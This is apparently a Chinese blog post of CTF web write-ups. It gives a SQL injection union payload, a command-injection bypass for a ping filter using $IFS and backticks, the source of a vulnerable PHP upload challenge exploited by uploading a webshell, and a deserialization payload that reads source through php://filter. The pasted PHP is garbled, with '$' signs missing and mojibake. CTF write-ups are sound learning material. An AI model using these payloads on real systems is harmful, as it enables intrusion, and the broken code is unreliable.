V&N赛高!这次体验不错 做完web就看师傅们ak别的题目了
把自己出来的几道web题解放上来

BabySqli

题目给了语句 构造联合查询

name=adm'union select 1,'admin','e10adc3949ba59abbe56e057f20f883e'#&pw=123456 

GXY{y0u_4re_not_aDmin!}

ping ping ping

题目是一个执行Ping命令的窗口 过滤了大多数符号和flag还有空格
img

1;cat$IFSls; 让cat执行ls的结果

参考文章http://www.it1352.com/757355.html

BabysqliV3.0

登陆口admin password上去upload目录能读源码

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 

<form action="" method="post" enctype="multipart/form-data">

ä¸Šä¼ æ–‡ä»¶

<input type="file" name="file" />

<input type="submit" name="submit" value="ä¸Šä¼ " />

</form>

<?php

error_reporting(0);

class Uploader{

public Filename;

publiccmd;

public token;

function __construct(){sandbox = getcwd()."/uploads/".md5(_SESSION['user'])."/";ext = ".txt";

@mkdir(sandbox, 0777, true);

if(isset(_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", _GET['name'])){this->Filename = _GET['name'];

}

else{this->Filename = sandbox._SESSION['user'].ext;

}this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";

this->token =_SESSION['user'];

}

function upload(file){

globalsandbox;

global ext;

if(preg_match("[^a-z0-9]",this->Filename)){

this->cmd = "die('illegal filename!');";

}

else{

if(file['size'] > 1024){

this->cmd = "die('you are too big (′▽`〃)');";

}

else{this->cmd = "move_uploaded_file('".file['tmp_name']."', '" .this->Filename . "');";

}

}

}

function __toString(){

global sandbox;

globalext;

// return sandbox.this->Filename.ext;

returnthis->Filename;

}

function __destruct(){

if(this->token !=_SESSION['user']){

this->cmd = "die('check token falied!');";

}

eval(this->cmd);

}

}

if(isset(_FILES['file'])) {uploader = new Uploader();

uploader->upload(_FILES["file"]);

if(@file_get_contents(uploader)){

echo "ä¸‹é¢æ˜¯ä½ ä¸Šä¼ çš„æ–‡ä»¶ï¼š<br>".uploader."<br>";

echo file_get_contents($uploader);

}

}

?>

phar没打出来 一看文件名可控直接写进去个webshell- -问了下出题人说是非预期

后来看了眼可能是因为出题人手贱多在.前面打了个空格-。-然后正则匹配的就是’ .’了 就相当于没写

图片加载不出来了- -不放了
用name控制文件名传上去webshell
然后蚁剑连

Do you know robot

robots.txt里给了源码的页面

?exp=O:10:"FileReader":4:{s:8:"Filename";s:58:"php://filter/read=convert.base64-encode/resource=index.php";s:5:"start";i:0;s:10:"max_length";i:10000;} 

get参数置空 post参数里传payload

另外几道web出的比群里的师傅们慢 没写wp就不放了
都比较简单

Categories: 技术

0 Comments

发表评论

Avatar placeholder

您的电子邮箱地址不会被公开。 必填项已用*标注